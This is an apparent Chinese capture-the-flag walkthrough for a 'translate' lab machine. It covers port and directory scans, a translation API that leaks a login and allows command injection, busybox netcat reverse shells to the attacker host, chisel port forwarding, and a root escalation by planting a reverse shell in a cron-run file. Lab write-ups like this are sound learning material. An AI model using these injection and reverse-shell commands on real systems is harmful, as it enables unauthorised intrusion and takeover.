translate靶机复盘

一.信息收集：

1.1 端口扫描：

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- 192.168.122.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 08:55 EDT
Nmap scan report for 192.168.122.117
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: \xE6\x88\x91\xE7\x9A\x84\xE9\xA1\xB5\xE9\x9D\xA2
|_http-server-header: Apache/2.4.62 (Debian)
5001/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.9.2)
|_http-server-header: Werkzeug/3.1.3 Python/3.9.2
|_http-title: 405 Method Not Allowed
MAC Address: 08:00:27:6D:4E:8B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.122.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.34 seconds

比之前的靶机多扫了一个5001的端口，老样子还是先看web界面,检查了一下源代码，没有什么线索。

1.2 目录扫描：

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://192.168.122.117/  -x php txy zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.122.117/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/admin.php            (Status: 200) [Size: 1833]
/admin.php            (Status: 200) [Size: 1833]
/index.html           (Status: 200) [Size: 2131]
/server-status        (Status: 403) [Size: 280]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================



┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://192.168.122.117:5001/  -x php txy zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.122.117:5001/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/info                 (Status: 200) [Size: 12462]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

二. getshell：

发现个登录界面，试了一下弱口令，没有什么效果

在5001的端口上发现可以使用API进行翻译，利用一下这个API看看能不能翻译出什么东西

方式一：

{"translations":[{"detected_sour┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST 
{"error":"415 Unsupported Media Type: Did not attempt to load JSON data because the request Content-Type was not 'application/json'."}


┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST -H 'Content-Type: application/json'
{"error":"400 Bad Request: The browser (or proxy) sent a request that this server could not understand."}

┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST -H 'Content-Type: application/json' -d '{"key": "value"}'
{"error":"Missing required field: source_lang"}

┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST -H 'Content-Type: application/json' -d '{"source_lang":"en"}'
{"error":"Missing required field: target_lang"}

┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST -H 'Content-Type: application/json' -d '{"source_lang":"en","target_lang":"zh-cn"}'
{"error":"Missing required field: text_list"}

┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST -H 'Content-Type: application/json' -d '{"source_lang":"en","target_lang":"zh-cn","text_list":["就你也想要账号？？？？"]}'

{"translations":[{"detected_source_lang":"en","text":"welcome:7h1515P4zzw0Rd"}]}
ce_lang":"a","text":"welcome:7h1515P4zzw0Rd"}]}

//curl参数：
-X: 指定 HTTP 请求的方法
-H: 设置请求头（Header）信息
-d: 发送 POST 请求的表单数据

得到了账号 welcome:7h1515P4zzw0Rd 进行登录admi.php，是个命令注入，执行反弹shell即可（注意：靶机没有nc命令，需要使用busybox）

busybox nc 192.168.122.222 4444 -e /bin/bash 

方式二：

┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST -H 'Content-Type: application/json' -d '{"source_lang":"en","target_lang":"zh-cn","text_list":["id"]}'
{"translations":[{"detected_source_lang":"en","text":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"}]}

发现也可以命令注入，使用反弹shell进行连接

┌──(root㉿kali)-[~]
└─# curl http://192.168.122.117:5001 -X POST -H 'Content-Type: application/json' -d '{"source_lang":"en","target_lang":"zh-cn","text_list":["busybox nc 192.168.122.222 4444 -e /bin/bash "]}'


┌──(root㉿kali)-[~]
└─# nc -lvp 4444
listening on [any] 4444 ...
192.168.122.117: inverse host lookup failed: Unknown host
connect to [192.168.122.222] from (UNKNOWN) [192.168.122.117] 60908
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

三 . 权限提升：

user.flag:

www-data@translate:/home$ cd welcome/
www-data@translate:/home/welcome$ ls
py  user.txt
www-data@translate:/home/welcome$ cat user.txt 
flag{user-51860845-225a-42f3-b492-0a63bc722a96}

SUDO，SUID等提权方式都看过了，没有什么能利用的点，再看一下计划任务，传入pspy64s ，发现有text.sh文件在执行计划任务

思路：在text.sh中写下定时反弹shell的任务，等待反弹

www-data@translate:/tmp$ echo 'busybox nc 192.168.122.222 1234 -e /bin/bash' > /tmp/test.sh
www-data@translate:/tmp$ chmod 777 test.sh 
www-data@translate:/tmp$ 

┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...

但是没有反弹回来，这又是为什么？
原因：www-data的shell是反弹回来的shell，并不是真正的shell（不是真正的根目录，是嵌入得到的结果）tmp隔离了

查看一下网络连接：

www-data@translate:/tmp$ ss -lnutp
Netid     State      Recv-Q     Send-Q         Local Address:Port         Peer Address:Port            udp       UNCONN     0          0                    0.0.0.0:68                0.0.0.0:*             
tcp       LISTEN     0          128                  0.0.0.0:22                0.0.0.0:*             
tcp       LISTEN     0          128                127.0.0.1:8000              0.0.0.0:*             
tcp       LISTEN     0          128                  0.0.0.0:5001              0.0.0.0:*        users:(("python3",pid=374,fd=3))     
tcp       LISTEN     0          128                     [::]:22                   [::]:*             
tcp       LISTEN     0          128                        *:80                      *:*       

发现有个8000的内部端口，需要给它转发出来

靶机：

./chisel client 192.168.122.222:7080 R:1111:127.0.0.1:8000

kali:

./chisel server -p 7080 –reverse

成功转发：

思路：

前提知识点：

welcome用户 可以进入到标准的tmp目录中去，

www-data 反弹回来的shell不能进入完整的tmp目录

利用可以进入tmp完整目录的文件user.txt（welecome用户的文件）替换掉不完整的tmp文件中的内容（计划任务可以进行触发）

www-data@translate:/tmp$ cat test.sh 
busybox nc 192.168.122.222 1234 -e /bin/bash
www-data@translate:/tmp$ cd /home/welcome/
www-data@translate:/home/welcome$ cat /tmp/test.sh > user.txt 
www-data@translate:/home/welcome$ cat user.txt 
busybox nc 192.168.122.222 1234 -e /bin/bash
www-data@translate:/home/welcome$ 

监听即可拿到root

┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
id
192.168.122.75: inverse host lookup failed: Unknown host
connect to [192.168.122.222] from (UNKNOWN) [192.168.122.75] 54276
uid=0(root) gid=0(root) groups=0(root)

补充：

chroot

核心功能与用途

1. 创建隔离环境
   借助 chroot，能够打造出一个与主机系统相隔离的环境，这个环境拥有独立的文件系统。在这个隔离环境中运行的程序无法访问外部的文件，这一特性使得它在安全测试或者运行不可信程序时非常实用。
2. 系统修复
   当系统出现故障无法正常启动时，可以通过从 LiveCD 启动并使用 chroot 切换到受损系统的根目录，进而进行系统修复操作，比如重新安装引导程序。
3. 软件测试
   可以使用 chroot 创建一个干净的测试环境，在这个环境中安装和运行软件，这样就能避免对主机系统造成影响。
4. 轻量级容器
   chroot 是实现容器技术（像 Docker）的基础组件之一，不过它的隔离性相对较弱。